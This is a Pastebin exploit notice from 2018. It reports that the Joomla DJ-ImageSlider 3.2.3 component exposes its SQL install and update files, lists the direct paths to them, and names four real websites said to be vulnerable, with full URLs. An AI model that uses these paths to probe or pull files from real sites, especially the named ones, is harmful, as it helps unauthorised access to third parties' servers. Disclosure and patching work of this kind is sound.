Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #################################################################################################
- # Exploit Title : Joomla com_djimageslider Components All in One 3.2.3 Database Backup Information Disclosure
- # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
- # Date : 27/11/2018
- # Vendor Homepage : joomla.org ~ dj-extensions.com
- # Tested On : Windows and Linux
- # Software Download Links :
- + dj-extensions.com/downloads/cat_view/76-dj-imageslider
- + sourceforge.net/p/giaiphapantoan/svn/24/tree/giaiphapantoanweb/administrator/components/com_djimageslider/
- + extensions.joomla.org/extension/dj-imageslider/
- + DJ-ImageSlider AIO (All In One) [Joomla 3.x] =>
- dj-extensions.com/downloads/doc_download/82-dj-imageslider-aio-all-in-one-joomla-3x
- + DJ-ImageSlider AIO (All In One) [Joomla 2.5] =>
- dj-extensions.com/downloads/doc_download/234-dj-imageslider-aio-all-in-one-joomla-25
- # Category : WebApps
- # Version Information : 3.2.3
- # Exploit Risk : Low
- # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
- CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
- CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
- #################################################################################################
- # Admin Panel Login Path :
- /administrator/
- # Exploit :
- /administrator/components/com_djimageslider/sql/._install.sql
- /administrator/components/com_djimageslider/sql/install.sql
- /administrator/components/com_djimageslider/sql/._uninstall.sql
- /administrator/components/com_djimageslider/sql/uninstall.sql
- /administrator/components/com_djimageslider/sql/updates/._1.3.sql
- /administrator/components/com_djimageslider/sql/updates/1.3.sql
- /administrator/components/com_djimageslider/sql/updates/._2.0.sql
- /administrator/components/com_djimageslider/sql/updates/2.0.sql
- #################################################################################################
- # Example Vulnerable Sites =>
- [+] ose.gr/administrator/components/com_djimageslider/sql/updates/2.0.sql
- [+] moob.cl/clientes/__MACOSX/puc/administrator/components/com_djimageslider/sql/updates/._2.0.sql
- [+] matekap.com/__MACOSX/360/immo/administrator/components/com_djimageslider/sql/updates/._2.0.sql
- [+] ahaic.org/__MACOSX/reff/administrator/components/com_djimageslider/sql/updates/._2.0.sql
- #################################################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- #################################################################################################
Advertisement
Add Comment
Please, Sign In to add comment